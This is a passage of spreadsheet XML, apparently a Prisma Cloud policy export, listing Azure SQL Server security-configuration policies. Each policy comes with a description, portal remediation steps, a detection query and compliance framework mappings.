          <t>This policy identifies Azure SQL Server which has ADS Vulnerability Assessment setting disabled. Advanced Data Security - Vulnerability Assessment service scans SQL databases for known security vulnerabilities and highlight deviations from best practices, such as misconfigurations, excessive permissions, and unprotected sensitive data. It is recommended to enable ADS - VA service.</t>
        </is>
      </c>
      <c r="X2430" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Select 'SQL servers', and select the SQL server you need to modify
3. Click on 'Microsoft Defender for Cloud' under 'Security'
4. Click on 'Enable Microsoft Defender for SQL' if Azure Defender is not enabled for SQL already
5. Click on '(Configure)' next to 'Microsoft Defender for SQL: Enabled at the server-level'
6. Ensure that 'MICROSOFT DEFENDER FOR SQL' status is 'ON'
7. 'Save' your changes 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-vulnerability-assessment-va-is-enabled-on-a-sql-server-by-setting-a-storage-account
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-vulnerability-assessment-va-is-enabled-on-a-sql-server-by-setting-a-storage-account</t>
        </is>
      </c>
      <c r="Y2430" t="inlineStr"/>
      <c r="Z2430" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-server-list' AND json.rule = (serverSecurityAlertPolicy.properties.state equal ignore case Disabled) or (serverSecurityAlertPolicy.properties.state equal ignore case Enabled and vulnerabilityAssessments[*].type does not exist)
{"category":"General","resourceTypes":["azurerm_mssql_server_security_alert_policy","azurerm_sql_server"]}</t>
        </is>
      </c>
      <c r="AA2430" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2430" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2430" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-655-CKV2_AZURE_2</t>
        </is>
      </c>
      <c r="AD2430" t="b">
        <v>1</v>
      </c>
      <c r="AE2430" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2430" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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0" t="inlineStr">
        <is>
          <t>b805e5f2-8479-4197-82ce-9d8fcdf38a44</t>
        </is>
      </c>
      <c r="AI2430" t="inlineStr">
        <is>
          <t>5ce54350-2196-4124-825e-01d4bd407f49</t>
        </is>
      </c>
      <c r="AJ2430" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2430" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2431">
      <c r="A2431" t="inlineStr">
        <is>
          <t>HIPAA, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27001:2022, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2022.2.1, MLPS 2.0 (Level 2), Telecommunications Security Act - TSA, Microsoft Cloud Security Benchmark v1, Sarbanes Oxley Act (SOX), HIPAA, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2431" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2431" s="2" t="inlineStr"/>
      <c r="D2431" t="inlineStr"/>
      <c r="E2431" t="inlineStr"/>
      <c r="F2431" t="inlineStr"/>
      <c r="G2431" t="b">
        <v>1</v>
      </c>
      <c r="H24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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2431" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2431" t="inlineStr">
        <is>
          <t>Azure SQL server Transparent Data Encryption (TDE) encryption disabled</t>
        </is>
      </c>
      <c r="L2431" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2431" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2431" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2431" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2431" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2431" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2431" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2431" t="inlineStr"/>
      <c r="T2431" t="b">
        <v>0</v>
      </c>
      <c r="U2431" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2431" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2431" t="inlineStr">
        <is>
          <t>This policy identifies SQL servers in which Transparent Data Encryption (TDE) is disabled. TDE encryption performs real-time encryption and decryption of the server, related reinforcements, and exchange log records without requiring any changes to the application. It is recommended to have TDE encryption on your SQL servers to protect the server from malicious activity.</t>
        </is>
      </c>
      <c r="X2431" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Select 'SQL servers'
3. Select the reported SQL server instance you want to modify
4. Select 'Transparent data encryption' under 'Security'
5. Select 'Select a key'
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2431" t="inlineStr"/>
      <c r="Z2431" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' and api.name = 'azure-sql-server-list' AND json.rule = ['sqlServer'].['properties.state'] equal ignore case Ready and sqlEncryptionProtectors[*].kind does not exist</t>
        </is>
      </c>
      <c r="AA2431" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2431" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2431" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-941</t>
        </is>
      </c>
      <c r="AD2431" t="b">
        <v>1</v>
      </c>
      <c r="AE2431" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2431" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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1" t="inlineStr">
        <is>
          <t>8e58437c-1363-4d96-951f-490ad22e7a15</t>
        </is>
      </c>
      <c r="AI2431" t="inlineStr">
        <is>
          <t>83cc4cc9-9082-436d-9db6-895b9b4993da</t>
        </is>
      </c>
      <c r="AJ2431" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2431" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2432">
      <c r="A2432" t="inlineStr">
        <is>
          <t>Sarbanes Oxley Act (SOX), ISO/IEC 27017:2015, NIST SP 800-171 Revision 2, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, MLPS 2.0 (Level 2), PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CIS v1.4.0 (Azure), CSA CCM v.4.0.1, CIS v1.2.0 (Azure), CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST 800-53 Rev 5, CIS v2.0.0 (Azure) Level 2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27001:2022, CIS v1.3.0 (Azure), Azure Security Benchmark (v3), ISO/IEC 27017:2015, NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2022.2.1, Azure Security Benchmark (v2), CIS v1.5.0 (Azure) - Level 2, MTSBv2_Azure, Azure Security Benchmark (v2), NIST 800-53 Rev 5, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), Copy of Azure Security Benchmark (v3), Copy of New Zealand Information Security Manual (NZISM v3.4), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NIST CSF, Azure Security Benchmark (v2), CSA CCM v.4.0.1, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ITSG-33, Microsoft Cloud Security Benchmark v1, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, TX-RAMP Level 2, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), NIST CSF, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), HIPAA, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, CSA CCM v.4.0.1, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, CIS v1.3.1 (Azure), NIST CSF, Azure Security Benchmark (v2), NIST CSF, ISO/IEC 27002:2013, TX-RAMP Level 1, ISO/IEC 27001:2022, Copy of CIS v1.2.0 (Azure), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Azure Security Benchmark (v3), ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST SP 800-172, CSA CCM v.4.0.1, ISO/IEC 27018:2019, CSA CCM v.4.0.1, ISO/IEC 27018:2019, NIST CSF, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2432" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2432" s="2" t="inlineStr"/>
      <c r="D2432" t="inlineStr"/>
      <c r="E2432" t="inlineStr"/>
      <c r="F2432" t="inlineStr"/>
      <c r="G2432" t="b">
        <v>0</v>
      </c>
      <c r="H24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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2432" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2432" t="inlineStr">
        <is>
          <t>Azure SQL Server ADS Vulnerability Assessment 'Send scan reports to' is not configured</t>
        </is>
      </c>
      <c r="L2432" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2432" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2432" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2432" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2432" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2432" t="inlineStr">
        <is>
          <t>Database Services</t>
        </is>
      </c>
      <c r="R2432" t="inlineStr">
        <is>
          <t>4.2.7</t>
        </is>
      </c>
      <c r="S2432" t="inlineStr"/>
      <c r="T2432" t="b">
        <v>0</v>
      </c>
      <c r="U2432" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2432" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2432" t="inlineStr">
        <is>
          <t>This policy identifies Azure SQL Server which has ADS Vulnerability Assessment 'Send scan reports to' not configured. This setting enables ADS - VA scan reports being sent to email ids that are configured at 'Send scan reports to' field. It is recommended to update 'Send scan reports to' with email ids which would help in reducing time required for identifying risks and taking corrective measures.</t>
        </is>
      </c>
      <c r="X2432" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Select 'SQL servers', and select the SQL server you need to modify
3. Click on 'Microsoft Defender for Cloud' under 'Security'
4. Click on '(Configure)' next to 'Microsoft Defender for SQL: Enabled at the server-level'
5. Specify one or more email ids to 'Send scan reports to' under 'VULNERABILITY ASSESSMENT SETTINGS'
6. 'Save' your changes</t>
        </is>
      </c>
      <c r="Y2432" t="inlineStr"/>
      <c r="Z2432" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-server-list' AND json.rule = vulnerabilityAssessments[*].properties.storageContainerPath exists and vulnerabilityAssessments[*].properties.recurringScans.emails[*] is empty</t>
        </is>
      </c>
      <c r="AA2432" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2432" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2432" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-657</t>
        </is>
      </c>
      <c r="AD2432" t="b">
        <v>1</v>
      </c>
      <c r="AE2432" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2432" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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2" t="inlineStr">
        <is>
          <t>bfff252d-3f21-4115-978d-e1a48d8ae19c</t>
        </is>
      </c>
      <c r="AI2432" t="inlineStr">
        <is>
          <t>b80353a6-21f9-48bf-8c99-8f94716076e5</t>
        </is>
      </c>
      <c r="AJ2432" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2432" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2433">
      <c r="A2433" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2433" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2433" s="2" t="inlineStr"/>
      <c r="D2433" t="inlineStr"/>
      <c r="E2433" t="inlineStr"/>
      <c r="F2433" t="inlineStr"/>
      <c r="G2433" t="b">
        <v>1</v>
      </c>
      <c r="H24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33" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2433" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2433" t="inlineStr">
        <is>
          <t>Azure SQL server using insecure TLS version</t>
        </is>
      </c>
      <c r="L2433" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2433" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2433" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2433" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2433" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2433" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R2433" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S2433" t="inlineStr"/>
      <c r="T2433" t="b">
        <v>0</v>
      </c>
      <c r="U2433" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2433" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2433" t="inlineStr">
        <is>
          <t>This policy identifies Azure SQL servers which use insecure TLS version.
Enforcing TLS connections between database server and client applications helps protect against 'man in the middle' attacks by encrypting the data stream between the server and application.
As a security best practice, it is recommended to use the latest TLS version for Azure SQL server.</t>
        </is>
      </c>
      <c r="X2433" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Select 'SQL servers'
3. Click on the reported SQL server instance you wanted to modify
4. Navigate to Security -&gt; Networking -&gt; Connectivity
5. Under 'Encryption in transit' section, Set 'Minimum TLS Version' to 'TLS 1.2' or higher.
6. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-mssql-is-using-the-latest-version-of-tls-encryption
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-mssql-is-using-the-latest-version-of-tls-encryption</t>
        </is>
      </c>
      <c r="Y2433" t="inlineStr"/>
      <c r="Z2433" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-server-list' AND json.rule = ['sqlServer'].['properties.state'] equal ignore case "Ready" and (['sqlServer'].['properties.minimalTlsVersion'] equal ignore case "None" or ['sqlServer'].['properties.minimalTlsVersion'] equals "1.0" or ['sqlServer'].['properties.minimalTlsVersion'] equals "1.1")
{"category":"General","resourceTypes":["azurerm_mssql_server"]}</t>
        </is>
      </c>
      <c r="AA2433" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2433" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2433" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-754-CKV_AZURE_52</t>
        </is>
      </c>
      <c r="AD2433" t="b">
        <v>1</v>
      </c>
      <c r="AE2433" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2433" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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33" t="inlineStr">
        <is>
          <t>b65c4ddf-6ece-4fd5-8ffc-3ce85343fc40</t>
        </is>
      </c>
      <c r="AI2433" t="inlineStr">
        <is>
          <t>72f2c9e3-cbbd-4643-8978-e8319e5087b1</t>
        </is>
      </c>
      <c r="AJ2433" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2433" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2434">
      <c r="A2434" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, APRA (CPS 234) Information Security, NIST SP 800-172, CIS v2.1.0 (Azure) Level 2, CIS Controls v8, CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.2.0 (Azure), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, MLPS 2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, Fedramp (Moderate), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MTSBv2_Azure, Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, PCI DSS v4.0, NIST 800-53 Rev 5, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], CyberSecurity Law of the People's Republic of China, jneytchev-fedramp-low, Fedramp (Low), SOC 2, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Microsoft Cloud Security Benchmark v1, testazure, CIS v1.3.0 (Azure), DORA, Copy of ACSC Information Security Manual (ISM)-clone, CIS v1.3.1 (Azure), ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), PCI DSS v4.0, NIST 800-53 Rev4, Telecommunications Security Act - TSA, Copy of CIS v1.2.0 (Azure), CDC NIST 800-53 Rev4, CIS v2.0.0 (Azure) Level 2, NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27018:2019, CyberSecurity Law of the People's Republic of China, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, Azure Security Benchmark (v3), PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, NIST SP 800-171 Revision 3, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), PCI DSS v4.0, GDPR, HIPAA, SOC 2, Fedramp (Moderate), ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, Azure Security Benchmark (v3), CIS v1.5.0 (Azure) - Level 2, New Zealand Information Security Manual (NZISM v3.4), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, CIS v1.1 (Azure), CIS v1.4.0 (Azure), Azure Security Benchmark (v2), PCI DSS v4.0, NIST SP 800-171 Revision 2, PCI DSS v3.2.1, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2434" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2434" s="2" t="inlineStr"/>
      <c r="D2434" t="inlineStr"/>
      <c r="E2434" t="inlineStr"/>
      <c r="F2434" t="inlineStr"/>
      <c r="G2434" t="b">
        <v>1</v>
      </c>
      <c r="H24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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2434" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2434" t="inlineStr">
        <is>
          <t>Azure SQL server TDE protector is not encrypted with BYOK (Use your own key)</t>
        </is>
      </c>
      <c r="L2434" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2434" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2434" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2434" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2434" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2434" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2434" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S2434" t="inlineStr">
        <is>
          <t>Policy Status Review</t>
        </is>
      </c>
      <c r="T2434" t="b">
        <v>0</v>
      </c>
      <c r="U2434" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2434" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2434" t="inlineStr">
        <is>
          <t>This policy identifies Bring Your Own Key(BYOK) support for Transparent Data Encryption(TDE) in SQL server. The data encryption key(DEK) can be protected with an asymmetric key that is stored in the Key Vault which allows user control of TDE encryption keys and restricts who can access them and when.</t>
        </is>
      </c>
      <c r="X2434" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Navigate to 'SQL servers' dashboard, and select the SQL server instance you want to modify
3. In the left navigation, select 'Transparent data encryption'
4. Select Customer-managed key &gt; Select a key &gt; Change key
- In Key vault, select an existing key vault or create new key vault
- In Key, select an existing key or create a new key
- In Version, select an existing version or create new version
OR
Select Customer-managed key &gt; Enter a key identifier
- In Key identifier add key vault URI, if URI is already noted.
5. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2434" t="inlineStr"/>
      <c r="Z2434" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' and api.name = 'azure-sql-server-list' AND json.rule = sqlEncryptionProtectors[*].kind != azurekeyvault and sqlEncryptionProtectors[*].properties.serverKeyType != AzureKeyVault and sqlEncryptionProtectors[*].properties.uri !exists</t>
        </is>
      </c>
      <c r="AA2434" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2434" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2434" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-499</t>
        </is>
      </c>
      <c r="AD2434" t="b">
        <v>1</v>
      </c>
      <c r="AE2434" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2434" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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4" t="inlineStr">
        <is>
          <t>d61d46dd-ac60-4765-a77a-75072c553318</t>
        </is>
      </c>
      <c r="AI2434" t="inlineStr">
        <is>
          <t>65cb3032-1333-4375-a33b-96177d10debe</t>
        </is>
      </c>
      <c r="AJ2434" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2434" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2435">
      <c r="A2435" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CIS Controls v7.1, Sarbanes Oxley Act (SOX), CRI Profile v1.2.1, Fedramp (Low), kashan ACSC Information Security Manual (ISM), jneytchev-fedramp-low, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), ISO 27002:2022, TX-RAMP Level 2, MLPS 2.0 (Level 2), ISO/IEC 27001:2022, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, Copy of ACSC Information Security Manual (ISM)-clone, ACSC Information Security Manual (ISM), PCI DSS v3.2.1, jneytchev-fedramp-low, NIST CSF, CSA CCM v4.0.12, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, NIST 800-53 Rev 5, New Zealand Information Security Manual (NZISM v3.4), SOC 2, TX-RAMP Level 2, CSA CCM v4.0.12, CSA CCM v3.0.1, CyberSecurity Law of the People's Republic of China, NIST 800-53 Rev4, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, CyberSecurity Law of the People's Republic of China, TX-RAMP Level 2, ISO 27001:2013, kashan ACSC Information Security Manual (ISM), CIS Controls v8, SOC 2, PCI DSS v4.0, Copy of New Zealand Information Security Manual (NZISM v3.4), Fedramp (Moderate), Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, Copy of SOC 2, NIST SP 800-171 Revision 3, Fedramp (Moderate), SOC 2, CIS Controls v8.1, Copy of SOC 2, NIST 800-53 Rev 5, HITRUST CSF v9.3 [Deprecated], CDC NIST 800-53 Rev4, Copy of SOC 2, Copy of SOC 2, NIST 800-53 Rev 5, Fedramp (Moderate), NIST SP 800-171 Revision 2, kfirdaus AWS Account-CS, CyberSecurity Law of the People's Republic of China, NIST 800-53 Rev4, CDC NIST 800-53 Rev4, HITRUST CSF v9.3 [Deprecated], DORA, SOC 2, Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4), HITRUST CSF v9.3 [Deprecated], PIPEDA, SOC 2, APRA (CPS 234) Information Security, HITRUST CSF v.11.2.0, Fedramp (Low), HITRUST CSF v9.3 [Deprecated], CSA CCM v3.0.1, Copy of ACSC Information Security Manual (ISM)-clone, Copy of CIS Controls v8, RBI Baseline Cyber Security and Resilience Requirements, SOC 2, NIST SP 800-172, Secure Controls Framework (SCF) - 2024.2, ITSG-33, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), New Zealand Information Security Manual (NZISM v3.4), CCPA 2018, Microsoft Cloud Security Benchmark v1, CSA CCM v3.0.1, ACSC Information Security Manual (ISM), NIST SP 800-171 Revision 3, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.1.02, SOC 2, NIST SP 800-171 Revision 3, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], Brazilian Data Protection Law (LGPD), NIST 800-53 Rev4</t>
        </is>
      </c>
      <c r="B2435" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2435" s="2" t="inlineStr"/>
      <c r="D2435" t="inlineStr"/>
      <c r="E2435" t="inlineStr"/>
      <c r="F2435" t="inlineStr"/>
      <c r="G2435" t="b">
        <v>0</v>
      </c>
      <c r="H24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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2435" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2435" t="inlineStr">
        <is>
          <t>Azure SQL Database with Auditing Retention less than 90 days</t>
        </is>
      </c>
      <c r="L2435" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2435" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2435" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2435" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2435" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2435" t="inlineStr">
        <is>
          <t>SI-1</t>
        </is>
      </c>
      <c r="R2435" t="inlineStr">
        <is>
          <t>SI-12</t>
        </is>
      </c>
      <c r="S2435" t="inlineStr"/>
      <c r="T2435" t="b">
        <v>0</v>
      </c>
      <c r="U2435" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2435" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2435" t="inlineStr">
        <is>
